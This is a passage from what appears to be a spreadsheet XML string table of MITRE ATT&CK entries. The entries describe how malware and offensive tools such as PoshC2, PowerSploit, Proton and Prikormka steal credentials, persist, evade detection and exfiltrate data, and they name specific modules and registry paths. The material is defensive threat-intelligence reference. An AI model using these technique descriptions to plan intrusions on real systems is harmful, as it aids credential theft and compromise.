    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains a module for recursively parsing through files and directories to gather valid credit card numbers.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has modules for brute forcing local administrator and AD user accounts.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can utilize multiple methods to bypass UAC.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use Invoke-RunAs to make tokens.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules for searching for passwords in local and remote files.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can enumerate local and domain user account information.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has modules for enumerating domain trusts.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules for local privilege escalation exploits such as CVE-2016-9192 and CVE-2016-0099.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains a module for exploiting SMB via EternalBlue.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can enumerate files on the local file system and includes a module for enumerating recently accessed files.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has modules for keystroke logging and capturing credentials from spoofed Outlook authentication messages.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains an implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to gather credentials from memory.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules, such as &lt;code&gt;Get-LocAdm&lt;/code&gt; for enumerating permission groups.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can perform port scans from an infected host.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains a module for taking packet captures on compromised hosts.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has a number of modules that leverage pass the hash for lateral movement.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use &lt;code&gt;Get-PassPol&lt;/code&gt; to enumerate the domain password policy.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains multiple modules for injecting into processes, such as &lt;code&gt;Invoke-PSInject&lt;/code&gt;.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules that allow for use of proxies in command and control.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains an implementation of [PsExec](https://attack.mitre.org/software/S0029) for remote execution.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules, such as &lt;code&gt;Get-ComputerInfo&lt;/code&gt;, for enumerating common system information.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can enumerate network adapter information.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains an implementation of [netstat](https://attack.mitre.org/software/S0104) to enumerate TCP and UDP connections.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can enumerate service and service permission information.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use protocols like HTTP/HTTPS for command and control traffic.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has a number of modules that use WMI to execute tasks.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has the ability to persist on a system using WMI events.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[Power Loader](https://attack.mitre.org/software/S0177) overwrites Explorer’s Shell_TrayWnd extra window memory to redirect execution to a NTDLL function that is abused to assemble and execute a return-oriented programming (ROP) chain and create a malicious thread within Explorer.exe.(Citation: MalwareTech Power Loader Aug 2013)(Citation: WeLiveSecurity Gapz and Redyms Mar 2013)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to get text of the current foreground window.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to write random data across a file and delete it.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get the current directory name as well as the size of a file. It also has commands to obtain information about logical drives, drive type, and free space.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to download a file.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) hides many of its backdoor payloads in an alternate data stream (ADS).(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to list the victim's processes.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) achieves persistence by using various Registry Run keys.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) uses rundll32.exe to load.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[PowerDuke](https://attack.mitre.org/software/S0139) uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm (TEA).(Citation: Volexity PowerDuke November 2016) </t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get information about the victim's name, build, version, serial number, and memory usage.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to get the victim's domain and NetBIOS name.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get the current user's name and SID.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get the time the machine was built, the time, and the time zone.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) runs &lt;code&gt;cmd.exe /c&lt;/code&gt; and sends the output to its C2.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has used 7Zip to compress .txt, .pdf, .xls or .doc files prior to exfiltration.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has used a PowerShell document stealer module to pack and exfiltrate .txt, .pdf, .xls or .doc files smaller than 5MB that were modified during the past two days.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to remove all files created during the dropper process.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has added a registry key so future powershell.exe instances are spawned with coordinates for a window position off-screen by default.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) is a backdoor written in PowerShell.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to deploy a reconnaissance module to retrieve a list of the active processes.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) sets up persistence with a Registry run key.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to encode C2 communications with base64 encoding.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has collected system information on the infected host.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to identify the current Windows domain of the infected host.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to identify the current user on the infected host.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to save and execute VBScript.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-TokenManipulation&lt;/code&gt; Exfiltration module can be used to manipulate tokens.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-MicrophoneAudio&lt;/code&gt; Exfiltration module can record system microphone audio.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) has several modules that search the Windows Registry for stored credentials: &lt;code&gt;Get-UnattendedInstallFile&lt;/code&gt;, &lt;code&gt;Get-Webconfig&lt;/code&gt;, &lt;code&gt;Get-ApplicationHost&lt;/code&gt;, &lt;code&gt;Get-SiteListPassword&lt;/code&gt;, &lt;code&gt;Get-CachedGPPPassword&lt;/code&gt;, and &lt;code&gt;Get-RegistryAutoLogon&lt;/code&gt;.(Citation: Pentestlab Stored Credentials)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can access data from local files, volumes, and processes.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) has modules such as &lt;code&gt;Get-NetDomainTrust&lt;/code&gt; and &lt;code&gt;Get-NetForestTrust&lt;/code&gt; to enumerate domain and forest trusts.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of CodeExecution modules that inject code (DLL, shellcode) into a process.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>Group Policy Preferences</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Find-AVSignature&lt;/code&gt; AntivirusBypass module can be used to locate single byte anti-virus signatures.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-Kerberoast&lt;/code&gt; module can request service tickets and return crackable ticket hashes.(Citation: PowerSploit Invoke Kerberoast)(Citation: Harmj0y Kerberoast Nov 2016)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-Keystrokes&lt;/code&gt; Exfiltration module can log keystrokes.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can harvest credentials using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-ProcessTokenGroup&lt;/code&gt; Privesc-PowerUp module can enumerate all SIDs associated with its current token.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of ScriptModification modules that compress and encode scripts and payloads.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit path interception opportunities in the PATH environment variable.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit search order hijacking vulnerabilities.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit unquoted path vulnerabilities.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) reflectively loads a Windows PE file into a process.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) modules are written in and executed via [PowerShell](https://attack.mitre.org/techniques/T1086).(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-ProcessTokenPrivilege&lt;/code&gt; Privesc-PowerUp module can enumerate privileges for a given process.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can query Registry keys for potential opportunities.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;New-UserPersistenceOption&lt;/code&gt; Persistence argument can be used to establish via the &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;New-UserPersistenceOption&lt;/code&gt; Persistence argument can be used to establish via a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053).(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-TimedScreenshot&lt;/code&gt; Exfiltration module can take screenshots at regular intervals.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Install-SSP&lt;/code&gt; Persistence module can be used to establish by installing a SSP DLL.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can harvest credentials from Windows vault credential objects.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-WmiCommand&lt;/code&gt; CodeExecution module uses WMI to execute and retrieve the output from a [PowerShell](https://attack.mitre.org/techniques/T1086) payload.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) uses Microsoft OneDrive as a C2 server via a network drive mapped with &lt;code&gt;net use&lt;/code&gt;.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) uses a XOR cipher to encrypt command output written to its OneDrive C2 server.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) uses PowerShell loops to iteratively check for available commands in its OneDrive C2 server.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) has been used to monitor process lists.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) modifies the MAC times of its local log files to match that of the victim's desktop.ini file.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>After collecting documents from removable media, [Prikormka](https://attack.mitre.org/software/S0113) compresses the collected files, and encrypts it with Blowfish.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects passwords stored in applications installed on the victim.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) gathers logins and passwords stored in applications on the victims, including Google Chrome, Mozilla Firefox, and several other browsers.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) uses DLL search order hijacking for persistence by saving itself as ntshrui.dll to the Windows directory so it will load before the legitimate ntshrui.dll saved in the System32 subdirectory.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information about the paths, size, and creation time of files with specific file extensions, but not the actual content of the file.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>After encrypting its own log files, the log encryption module in [Prikormka](https://attack.mitre.org/software/S0113) deletes the original, unencrypted files from the host.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) contains a keylogger module that collects keystrokes and the titles of foreground windows.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) creates a directory, &lt;code&gt;%USERPROFILE%\AppData\Local\SKC\&lt;/code&gt;, which is used to store collected log files.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>Some resources in [Prikormka](https://attack.mitre.org/software/S0113) are encrypted with a simple XOR operation or encoded with Base64.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information on available printers and disk drives.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) adds itself to a Registry Run key with the name guidVGA or guidVSA.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) uses rundll32.exe to load its DLL.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) contains a module that captures screenshots of the victim's desktop.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about installed anti-virus software.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) encodes C2 traffic with Base64.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) encrypts some C2 traffic with the Blowfish cipher.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about Windows OS version, computer name, battery info, and physical memory.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about its IP addresses and MAC addresses.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about the current user name.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) zips up files before exfiltrating them.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>Clear Linux or Mac System Logs</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) removes logs from &lt;code&gt;/var/logs&lt;/code&gt; and &lt;code&gt;/Library/logs&lt;/code&gt;.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) gathers credentials for Google Chrome.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) uses an encrypted file to store commands and configuration values.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) kills security tools like Wireshark that are running.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) removes all files in the /tmp directory.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) prompts users for their credentials.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) gathers credentials in files for keychains.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) uses a keylogger to capture keystrokes.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) persists via Launch Agent.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>Password Managers</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) gathers credentials in files for 1password.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) captures the content of the desktop with the screencapture binary.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>Sudo and Sudo Caching</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) modifies the tty_tickets line in the sudoers file.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) uses macOS' .command file type to script actions.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) uses VNC to connect into systems.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) automatically collects data about the victim and sends it to the control server.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) can overwrite files indicated by the attacker before deleting them.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) searches the local system and gathers data.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) performs data exfiltration over the control server channel using a custom protocol.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) can delete files indicated by the attacker and remove itself from disk using a batch file.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) lists files in directories.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) lists processes running on the system.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) gathers product names from the Registry key: &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion ProductName&lt;/code&gt; and the processor description from the Registry key &lt;code&gt;HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ProcessorNameString&lt;/code&gt;.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) registers itself as a service on the victim’s machine to run as a standalone process.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) collects the OS version, country name, MAC address, computer name, physical memory statistics, and volume information for all drives on the system.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) collects the network adapter information and domain/username information based on current remote sessions.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>As part of the data reconnaissance phase, [Proxysvc](https://attack.mitre.org/software/S0238) grabs the system time to send back to the control server.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) uses HTTP over SSL to communicate commands with the control server.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) executes a binary on the system and logs the results into a temp file by using: &lt;code&gt;cmd.exe /c "&lt;file_path&gt; &gt; %temp%\PM* .tmp 2&gt;&amp;1"&lt;/code&gt;.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[PsExec](https://attack.mitre.org/software/S0029) can be used to download or upload a file over a network share.(Citation: PsExec Russinovich)</t>
  </si>
  <si>
    <t>[PsExec](https://attack.mitre.org/software/S0029), a tool that has been used by adversaries, writes programs to the &lt;code&gt;ADMIN$&lt;/code&gt; network share to execute commands on remote systems.(Citation: PsExec Russinovich)</t>
  </si>
  <si>
    <t>Microsoft Sysinternals [PsExec](https://attack.mitre.org/software/S0029) is a popular administration tool that can be used to execute binaries on remote systems using a temporary Windows service.(Citation: Russinovich Sysinternals)</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) exfiltrates data to its C2 server over the same protocol as C2 communications.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) has commands to enumerate all storage devices and to find all files that start with a particular string.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) has a command to download a file to the system from its C2 server.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) has a command to conduct timestomping by setting a specified file’s timestamps to match those of a system file in the System32 directory.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) uses HTTPS for C2.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) exfiltrates screenshot files to its C2 server.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can delete files that may interfere with it executing. It also can delete temporary files and itself after the initial script executes.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) identifies files matching certain file extension and copies them to subdirectories it created.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can download and execute additional files.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) creates various subdirectories under &lt;code&gt;%Temp%\reports\%&lt;/code&gt; and copies files to those subdirectories. It also creates a folder at &lt;code&gt;C:\Users\&lt;Username&gt;\AppData\Roaming\Microsoft\store&lt;/code&gt; to store screenshot JPEG files.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) copies itself to the Startup folder to establish persistence.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) executes functions using rundll32.exe.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) schedules tasks to invoke its components in order to establish persistence.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
